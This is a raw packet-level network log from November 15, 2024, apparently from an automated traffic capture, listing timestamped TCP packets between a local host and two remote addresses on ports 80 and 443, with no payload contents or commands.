                                                                                                                Nov 15, 2024 18:14:06.554548025 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.554568052 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.554585934 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.554991007 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.555011988 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.555037022 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.555037022 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.555054903 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.555059910 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.555078983 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.555083990 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.555094004 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.555133104 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.555808067 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.555830002 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.555854082 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.555857897 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.555876017 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.555891991 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.556330919 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.556350946 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.556375027 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.556376934 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.556399107 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.556399107 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.556421041 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.556421995 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.556430101 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.556468964 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.557270050 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.557291985 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.557315111 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.557318926 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.557334900 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.557338953 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.557352066 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.557358980 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.557377100 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.557384968 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.557394981 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.557420015 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.557926893 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.557948112 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.557971954 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.557972908 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.557991028 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.558012009 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.669008970 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669071913 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669091940 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669168949 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.669249058 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669275045 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.669286966 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669295073 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.669310093 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669333935 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669347048 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.669347048 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.669852018 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669881105 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669902086 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669913054 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.669928074 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669948101 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669950962 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.669972897 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.669976950 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.670001984 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.670010090 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.670614958 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.670635939 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.670661926 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.670665979 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.670686007 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.670722008 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.670722008 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.670738935 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.671130896 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.671154976 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.671179056 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.671180010 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.671194077 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.671205997 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.671217918 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.671224117 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.671243906 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.671252966 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.671264887 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.671277046 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.671993971 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672017097 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672039986 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672043085 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672064066 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672068119 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672086954 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672089100 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672102928 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672116995 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672123909 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672147036 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672172070 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672696114 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672713041 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672743082 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672751904 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672763109 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672764063 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672790051 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672790051 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672812939 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672821045 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672840118 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:06.672871113 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672871113 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:06.672888041 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:11.326414108 CET8049730192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:11.326533079 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:11.392247915 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:11.392303944 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:11.392389059 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:11.404192924 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:11.404222012 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.296005964 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.296084881 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.300076008 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.300100088 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.300518990 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.318804979 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.359338999 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.487571955 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.487617016 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.487694979 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.487730980 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.487968922 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.488032103 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.488044024 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.542293072 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.604460955 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.604475021 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.604564905 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.604602098 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.605262041 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.605328083 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.605344057 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.605359077 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.605382919 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.606427908 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.606501102 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.606514931 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.651670933 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.720993996 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.721014977 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.721174955 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.721220016 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.721515894 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.721528053 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.721592903 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.721613884 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.722465038 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.722476006 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.722534895 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.722553015 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.723525047 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.723563910 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.723591089 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.723604918 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.723628998 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.724431992 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.724503994 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.724520922 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.725410938 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.725483894 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.725502014 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.725860119 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.725923061 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.725934982 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.776705027 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.837955952 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.837992907 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.838056087 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.838092089 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.838105917 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.838793993 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.838838100 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.838857889 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.838884115 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.838902950 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.839487076 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.839555025 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.839570999 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.840379953 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.840460062 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.840476990 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.841175079 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.841242075 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.841257095 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.842020988 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.842089891 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.842108965 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.842920065 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.843008995 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.843024969 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.843900919 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.843981028 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.843997002 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.844506979 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.844572067 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.844587088 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.845369101 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.845434904 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.845453978 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.845562935 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.845617056 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.845632076 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.846311092 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.846370935 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.846383095 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.847006083 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.847069025 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.847081900 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.847820997 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.847904921 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.847923040 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.901665926 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.954932928 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.954962969 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.955039024 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.955074072 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.955086946 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.955240011 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.955251932 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.955305099 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.955329895 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.955735922 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.955795050 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.955811024 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.956751108 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.956820011 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.956835032 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.957690001 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.957772017 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.957789898 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.957942009 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.958005905 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.958019018 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.958864927 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.958945990 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.958964109 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.959621906 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.959718943 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.959736109 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.960612059 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.960685968 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.960700035 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.960824966 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.960884094 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.960896015 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.961675882 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.961746931 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.961759090 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.962554932 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.962625980 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.962641001 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.963187933 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.963259935 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.963272095 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.963387012 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.963443995 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.963459969 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.964168072 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.964237928 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.964241982 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.964253902 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.964291096 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.965137959 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.965230942 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.965241909 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.965951920 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.965993881 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.966007948 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.966022968 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.966058016 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.966917992 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.966994047 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.967011929 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.967803001 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.967871904 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.967885017 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.967899084 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.968137980 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.968808889 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.968871117 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.968884945 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.968898058 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.968936920 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.970176935 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.970216990 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.970261097 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.970283031 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.970307112 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.971040964 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.971110106 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.971126080 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.998678923 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:12.998796940 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:12.998817921 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.042273998 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.071918011 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.072005987 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.072031021 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.072633982 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.072710991 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.072731018 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.073096991 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.073159933 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.073178053 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.073683023 CET44349731142.215.209.78192.168.2.4
